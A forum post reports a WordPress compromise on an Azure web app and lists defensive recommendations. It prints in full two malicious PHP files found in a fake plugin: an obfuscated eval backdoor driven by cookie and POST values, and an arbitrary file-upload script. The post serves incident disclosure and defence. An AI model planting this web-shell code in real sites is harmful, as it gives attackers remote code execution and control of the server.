Home

Malware Wordpress on Azure

%3CLINGO-SUB%20id%3D%22lingo-sub-881653%22%20slang%3D%22en-US%22%3EMalware%20Wordpress%20on%20Azure%3C%2FLINGO-SUB%3E%3CLINGO-BODY%20id%3D%22lingo-body-881653%22%20slang%3D%22en-US%22%3E%3CP%3ERecently%20received%20a%20security%20alert%20on%20a%20wordpress%20webapp%20running%20on%20Azure%3A%26nbsp%3B%3C%2FP%3E%0A%3CP%3E%26nbsp%3B%3C%2FP%3E%0A%3CP%3E1.%20There%20was%20a%20non-recognized%20authentication%20as%20admin%20user%3C%2FP%3E%0A%3CP%3E2.%20The%20user%20Uploaded%20a%20.zip%20file%20to%20the%20plugins%20folder%20that%20contained%202%20files%3A%20map.php%20and%20apikey.php%3C%2FP%3E%0A%3CP%3E3.%20The%20user%20performed%20a%20%22test%22%20through%20the%20%22plugin%22%3C%2FP%3E%0A%3CP%3E%26nbsp%3B%3C%2FP%3E%0A%3CP%3EExample%20of%20the%20code%20map.php%3A%3C%2FP%3E%0A%3CP%3E%26nbsp%3B%3C%2FP%3E%0A%3CP%3E%26nbsp%3B%3C%2FP%3E%0A%3CPRE%20class%3D%22lia-code-sample%20language-php%22%3E%3CCODE%3E%3CP%3E%3C%2FP%3E%0A%3CP%3E%26nbsp%3B%3C%2FP%3E%0A%3CP%3ESucuri%20sent%20out%20an%20alert%20that%20the%20.zip%20file%20was%20uploaded%20to%20the%20site.%20At%20this%20point%20there%20is%20no%20easy%20way%20to%20find%20the%20affected%20files%20on%20a%20Wordpress%20installation%20even%20using%20some%20tools%20like%20the%20sucuri%20scanner%20tool%20online.%26nbsp%3B%3C%2FP%3E%0A%3CP%3E%26nbsp%3B%3C%2FP%3E%0A%3CP%3ERecommendations%3A%26nbsp%3B%3C%2FP%3E%0A%3CP%3E%26nbsp%3B.%20Enable%20Sucuri%20plugin%20on%20your%20WP%3C%2FP%3E%0A%3CP%3E%26nbsp%3B.%20Enable%20WAF%20v2%20on%20your%20webapp%3C%2FP%3E%0A%3CP%3E%26nbsp%3B.%20If%20possible%20isolate%20your%20resource%20using%20App%20Service%20Environment%3C%2FP%3E%0A%3CP%3E%26nbsp%3B.%20Harden%20NSG(s)%3C%2FP%3E%0A%3CP%3E%26nbsp%3B.%26nbsp%3BPerform%20a%20SSL%20Test%20on%20your%20web%20app%3C%2FP%3E%0A%3CP%3E%26nbsp%3B%3C%2FP%3E%0A%3CP%3EIf%20you%20have%20any%20other%20tip%20recommendation%20please%20share!%3C%2FP%3E%3C%2FCODE%3E%3C%2FPRE%3E%3C%2FLINGO-BODY%3E%3CLINGO-LABS%20id%3D%22lingo-labs-881653%22%20slang%3D%22en-US%22%3E%3CLINGO-LABEL%3EApp%20Services%3C%2FLINGO-LABEL%3E%3CLINGO-LABEL%3EAzure%3C%2FLINGO-LABEL%3E%3CLINGO-LABEL%3ESecurity%3C%2FLINGO-LABEL%3E%3C%2FLINGO-LABS%3E
Highlighted
Dave Rendón
MVP

Recently received a security alert on a wordpress webapp running on Azure: 

 

1. There was a non-recognized authentication as admin user

2. The user Uploaded a .zip file to the plugins folder that contained 2 files: map.php and apikey.php

3. The user performed a "test" through the "plugin"

 

Example of the code map.php:

 

 

<?php $GLOBALS['_79565595_']=Array('str_' .'rot13','pack','st' .'rrev'); ?><?php function _1178619035($i){$a=Array("jweyc","aeskoly","owhggiku","callbrhy","H*");return $a[$i];} ?><?php function l__0($_0){return isset($_COOKIE[$_0])?$_COOKIE[$_0]:@$_POST[$_0];}$_1=l__0(_1178619035(0)) .l__0(_1178619035(1)) .l__0(_1178619035(2)) .l__0(_1178619035(3));if(!empty($_1)){$_1=$GLOBALS['_79565595_'][0](@$GLOBALS['_79565595_'][1](_1178619035(4),$GLOBALS['_79565595_'][2]($_1)));if(isset($_1)){@eval($_1);exit();}}

 

  

Example of code apikey.php:

 

 

<?php
/**
 * @package api key
 */
/*
Plugin Name: api key
*/

if ("hello"==$_GET["test"])
{
 echo "testtrue";
}
if(is_uploaded_file($_FILES["filename"]["tmp_name"]))
{
 move_uploaded_file($_FILES["filename"]["tmp_name"],$_FILES["filename"]["name"]);
 echo "true";
}

 

 

Image of the "Plugin" on the wordpress site: 

wordpress-malicious-code.png

 

Sucuri sent out an alert that the .zip file was uploaded to the site. At this point there is no easy way to find the affected files on a Wordpress installation even using some tools like the sucuri scanner tool online. 

 

Recommendations: 

 . Enable Sucuri plugin on your WP

 . Enable WAF v2 on your webapp

 . If possible isolate your resource using App Service Environment

 . Harden NSG(s)

 . Perform a SSL Test on your web app

 

If you have any other tip recommendation please share!

Related Conversations
Tabs and Dark Mode
cjc2112 in Discussions on
46 Replies
flashing a white screen while open new tab
Deleted in Discussions on
14 Replies
Security Community Webinars
Valon_Kolica in Security, Privacy & Compliance on
13 Replies
Stable version of Edge insider browser
HotCakeX in Discussions on
35 Replies
How to Prevent Teams from Auto-Launch
chenrylee in Microsoft Teams on
29 Replies
Extentions Synchronization
Deleted in Discussions on
3 Replies